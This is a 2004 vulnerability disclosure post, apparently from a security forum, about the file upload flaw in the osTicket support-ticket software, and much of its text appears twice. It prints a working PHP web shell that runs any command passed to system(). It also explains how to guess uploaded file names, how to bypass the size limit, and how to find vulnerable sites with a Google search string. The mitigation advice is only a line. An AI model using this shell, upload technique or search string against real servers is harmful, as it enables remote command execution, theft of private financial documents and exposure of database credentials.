ATTENTION ALL SITES USING OSTICKET. PLEASE DISABLE UPLOADS.
June 17 2004. Multiple Problems with osTicket
Software Data:
OSTICKET, http://www.osticket.com/
"Need to test the system before you install? Then try our demo version of the latest release of osTicket.
DEMO DISABLED"
Note: When a software group will not run their own program, you know it's not safe for you to run.
Problem:
CPanel and other webservers display directory listings of the /osticket/attachments folder. The documents here are private and often financial in nature.
Create a new ticket and upload a file with ticket.
Visit
www.example.com/osticket/attachments/
Now you see your uploaded file here. If you uploaded a PHP document containing
<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>
You can now run commands on the server by clicking the script.
There's more:
The os ticket software limits the size of uploads by a "hidden" field in the submit form. A user can modify this and upload a file of ANY size possibly leading the site to be shut down if it has webspace or traffic limitations.
Extra:
About 2/3 of sites using the osTicket software do not have directory listings turned on. For the determined hacker they are not safe. When a file is uploaded, it is renamed ######_filename where # is a random number. Because there are no ip restrictions on number of tickets a user could upload the PHP script say 100 times then use another script to randomly guess numbers followed by _name. Then in a MAX of 10k tries they will have hacked the server. This means that the other 2/3 of sites are hackable, just over a longer period of time.
I am sorry to all the servers that were hacked to discover this exploit. (funny joke)
Other:
Cpanel includes osticket. osticket is free. Sites can be found on google with the following url, changed around depending on what you want.
ATTENTION ALL SITES USING OSTICKET. PLEASE DISABLE UPLOADS.
June 17 2004. Multiple Problems with osTicket
Software Data:
OSTICKET, http://www.osticket.com/
"Need to test the system before you install? Then try our demo version of the latest release of osTicket.
DEMO DISABLED"
Note: When a software group will not run their own program, you know it's not safe for you to run.
Problem:
CPanel and other webservers display directory listings of the /osticket/attachments folder. The documents here are private and often financial in nature.
Solution:
Disable directory listing, change osTicket upload code.
Details:
First look at a site using osticket
www.example.com/osticket/
Create a new ticket and upload a file with ticket.
Visit
www.example.com/osticket/attachments/
Now you see your uploaded file here. If you uploaded a PHP document containing
<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>
You can now run commands on the server by clicking the script.
There's more:
The os ticket software limits the size of uploads by a "hidden" field in the submit form. A user can modify this and upload a file of ANY size possibly leading the site to be shut down if it has webspace or traffic limitations.
Extra:
About 2/3 of sites using the osTicket software do not have directory listings turned on. For the determined hacker they are not safe. When a file is uploaded, it is renamed ######_filename where # is a random number. Because there are no ip restrictions on number of tickets a user could upload the PHP script say 100 times then use another script to randomly guess numbers followed by _name. Then in a MAX of 10k tries they will have hacked the server. This means that the other 2/3 of sites are hackable, just over a longer period of time.
I am sorry to all the servers that were hacked to discover this exploit. (funny joke)
Other:
Cpanel includes osticket. osticket is free. Sites can be found on google with the following url, changed around depending on what you want.
http://www.google.com./search?q=%22Main%22+%22Help%22+%22Support+Ticket+
System%22+php+attachment&hl=en&lr=&ie=UTF-8&start=10&sa=N
osTicket requires sql and these exploits lead to the database login info being shown.
Greets: Jack, the general, www.wehack.com
~`TOBY`~
UPDATE JUNE 21ST
ITS NOT RANDOM NUMBERS ITS THE TICKET NUMBER YOU ARE GIVEN! ALL SERVERS ARE VULNERABLE
[ reply ]